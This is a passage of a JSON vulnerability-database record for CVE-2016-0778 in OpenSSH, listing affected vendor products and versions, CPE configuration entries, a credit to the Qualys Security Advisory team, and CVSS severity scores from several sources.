        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.0"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "7"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "14.04"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "extremexos patch",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7.31"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.13"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "5.5"
      },
      {
        "model": "linux",
        "scope": null,
        "trust": 0.3,
        "vendor": "gentoo",
        "version": null
      },
      {
        "model": "mac os security update",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x2016-0020"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.8"
      },
      {
        "model": "junos 14.2r6",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.3"
      },
      {
        "model": "junos 12.3x48-d30",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0"
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "netsight appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "4.4"
      },
      {
        "model": "junos 12.1x47-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.0"
      },
      {
        "model": "junos 12.3r12",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "purepower integrated manager appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "flex system chassis management module 2pet",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.12"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.5"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.0.7"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.2"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.6"
      },
      {
        "model": "junos 15.1f1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.2"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.12"
      },
      {
        "model": "junos 13.3r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.1"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.1"
      },
      {
        "model": "junos 12.1x46-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1"
      },
      {
        "model": "extremexos",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "16.2.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.11.3"
      },
      {
        "model": "junos 13.3r8",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.3"
      },
      {
        "model": "junos 13.3r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1x46-d25",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "6.2p2",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssh",
        "version": null
      },
      {
        "model": "junos 12.3x48-d20",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "linux ia-32",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "7.1"
      },
      {
        "model": "linux lts",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "tivoli provisioning manager for os deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2"
      },
      {
        "model": "purview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "0"
      },
      {
        "model": "nac appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "5.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.3"
      },
      {
        "model": "junos 12.1x46-d36",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "purview",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "6.3"
      },
      {
        "model": "junos 14.2r4",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.6"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2.1"
      },
      {
        "model": "junos 15.1r3",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.3.0"
      },
      {
        "model": "netsight appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "5.1"
      },
      {
        "model": "junos 12.1x46-d40",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "7.1"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.2"
      },
      {
        "model": "junos 15.1x49-d30",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.4.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.2.6"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "virtual customer access system",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "16.05"
      },
      {
        "model": "linux x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.14"
      },
      {
        "model": "junos 13.3r9",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.0"
      },
      {
        "model": "remote device access",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.1"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.9"
      },
      {
        "model": "junos 14.2r3",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 14.2r5",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "x7.1.1.0"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "5.4"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.0.7"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3.0.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.00"
      },
      {
        "model": "remote device access",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.7"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.0"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.2"
      },
      {
        "model": "junos 15.1f5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 13.3r7",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 14.2r1",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "junos 12.1x46-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.1"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "5.6"
      },
      {
        "model": "smartcloud provisioning for software virtual appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.1"
      },
      {
        "model": "junos 12.1x47-d15",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "enterprise linux hpc node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "junos 14.1r2",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "6.1"
      },
      {
        "model": "extremexos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "15.7.2"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.11"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "junos 12.1x47-d35",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.4"
      },
      {
        "model": "junos 12.3x48-d10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "junos 12.1x46-d26",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.1"
      },
      {
        "model": "identifi wireless",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "10.11.1"
      },
      {
        "model": "p2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "5.8"
      },
      {
        "model": "netsight appliance",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "extremenetworks",
        "version": "7.0.3"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.9"
      },
      {
        "model": "purepower integrated manager power vc appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "13.2"
      },
      {
        "model": "junos 12.3r10",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.19"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.5"
      },
      {
        "model": "openssh",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssh",
        "version": "7.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "15.04"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "5.1.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.0.9"
      },
      {
        "model": "pan-os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "paloaltonetworks",
        "version": "6.1.10"
      },
      {
        "model": "junos 14.1r6",
        "scope": null,
        "trust": 0.3,
        "vendor": "juniper",
        "version": null
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.10.5"
      },
      {
        "model": "6.9p1",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssh",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#456088"
      },
      {
        "db": "BID",
        "id": "80698"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.4:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.3:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.9:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.6:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.7:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.0:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.4:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.1:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.6:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.5:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:5.8:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.2:p2:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.9:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:7.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:openbsd:openssh:6.7:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.9.5",
                "versionStartIncluding": "10.9.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.10.5",
                "versionStartIncluding": "10.10.0",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:apple:mac_os_x:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "10.11.3",
                "versionStartIncluding": "10.11.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:hp:virtual_customer_access_system:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "15.07",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sophos:unified_threat_management_software:9.353:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Qualys Security Advisory team",
    "sources": [
      {
        "db": "BID",
        "id": "80698"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2016-0778",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "Single",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 4.6,
            "confidentialityImpact": "Partial",
            "exploitabilityScore": null,
            "id": "CVE-2016-0778",
            "impactScore": null,
            "integrityImpact": "Partial",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 4.6,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 3.9,
            "id": "VHN-88288",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "MEDIUM",
            "trust": 0.1,
            "vectorString": "AV:N/AC:H/AU:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 8.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 2.2,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 8.1,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2016-0778",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2016-0778",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201601-250",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-88288",
            "trust": 0.1,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2016-0778",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-88288"
      },
      {
        "db": "VULMON",
        "id": "CVE-2016-0778"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2016-001117"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201601-250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-0778"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
